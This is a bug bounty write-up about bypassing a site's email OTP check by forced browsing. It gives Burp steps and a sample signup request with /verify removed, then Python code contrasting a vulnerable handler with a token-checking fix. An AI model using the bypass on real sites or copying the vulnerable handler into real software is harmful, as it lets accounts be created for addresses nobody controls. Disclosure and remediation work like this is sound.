Today I would like to share one of the awesome findings by my fellow researcher friend that he came across in one of the private programs, where he was able to bypass the email verification phase implemented by the application.
Before getting started let me tell you about –
Forced Browsing:
Forced browsing is an attack technique against badly protected websites and web applications, which allows the attacker to access resources that they should not be able to access. Forced browsing is a common web application security issue caused by careless coding.
Let’s get started:
Let’s consider the target as redacted.com
Normal SIGNUP flow:
In order to create a new account, the user has to enter the 6 Digit OTP sent to the email address. Only if the user enters a valid OTP then a valid account will be created for that email address.
But, I observed that via forced browsing it is possible to create a valid account using any email address without entering the OTP.
Exploitation:
1) Navigate to the signup page
2) click on signup with email
3) Fill all the details like username, email address & password.
4) Now, turn ON the Burp intercept.
5) Click on Create account
6) Capture the particular POST request made to the endpoint POST /_api/signup/verify
7) Now remove the /verify from the POST request.
8) In the body of that POST request add "password":"anypassword" without any syntax mistakes. The final request should look as shown below:
POST /_ajax/signup HTTP/1.1
Host: www.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.redacted.com/en_in/
Content-Type: application/json;charset=UTF-8
Content-Length: 94
Origin: https://www.redacted.com
DNT: 1
Connection: close
{"xxxx":"xxxxx","sxxxxe":"xx-xx-xx","email":"asalsflab@gmails.com","password":"Password@123"}
Pass the modified request to the server.
Now, navigate to the login page and login using email address and password.
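From the defender's side, the root cause is that the account-creation endpoint never confirms that the OTP step actually happened; the two endpoints are only chained in the browser. The example below is added here and is not the application's code: it models the two endpoints named in the post with in-memory stores (an assumption), showing the vulnerable handler beside a fixed one that only creates an account when it receives a one-time token the verify step issued for that exact email.

```python
"""Constructed model of the signup flow from the write-up (not the real app).
The stores below stand in for the application's database."""
import hashlib
import hmac
import secrets
import time
from typing import Optional

PENDING_OTPS: dict = {}   # email -> (otp, expires_at)
VERIFIED: dict = {}       # email -> (verification_token, expires_at), set only after a correct OTP
ACCOUNTS: dict = {}       # email -> (salt, password hash)


def _hash_password(password: str) -> tuple:
    salt = secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def request_otp(email: str, ttl: int = 600) -> str:
    """Issue a 6-digit OTP. A real app e-mails it and never returns it to the client."""
    otp = f"{secrets.randbelow(10**6):06d}"
    PENDING_OTPS[email] = (otp, time.time() + ttl)
    return otp


def verify_otp(email: str, otp: str) -> Optional[str]:
    """POST /_api/signup/verify: on a correct OTP, bind a single-use token to the email."""
    stored = PENDING_OTPS.get(email)
    if not stored or time.time() > stored[1] or not hmac.compare_digest(stored[0], otp):
        return None
    del PENDING_OTPS[email]                       # an OTP is good for one attempt
    token = secrets.token_urlsafe(32)
    VERIFIED[email] = (token, time.time() + 600)
    return token


def signup_vulnerable(body: dict) -> int:
    """POST /_ajax/signup as described: assumes /verify already ran, so a direct
    request carrying only email and password creates the account."""
    ACCOUNTS[body["email"]] = _hash_password(body["password"])
    return 201


def signup_fixed(body: dict) -> int:
    """Same endpoint, fixed: refuse unless the body carries the unexpired token that
    verify_otp issued for this exact email, and consume it so it cannot be replayed."""
    email, token = body.get("email"), body.get("verification_token") or ""
    entry = VERIFIED.get(email)
    if not entry or time.time() > entry[1] or not hmac.compare_digest(entry[0], token):
        return 403
    del VERIFIED[email]
    ACCOUNTS[email] = _hash_password(body["password"])
    return 201
```

Binding the token to the email server-side is what closes the gap: a client that skips /verify, or reuses a token for a different address, gets 403 instead of an account.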
Hope you guys enjoyed it!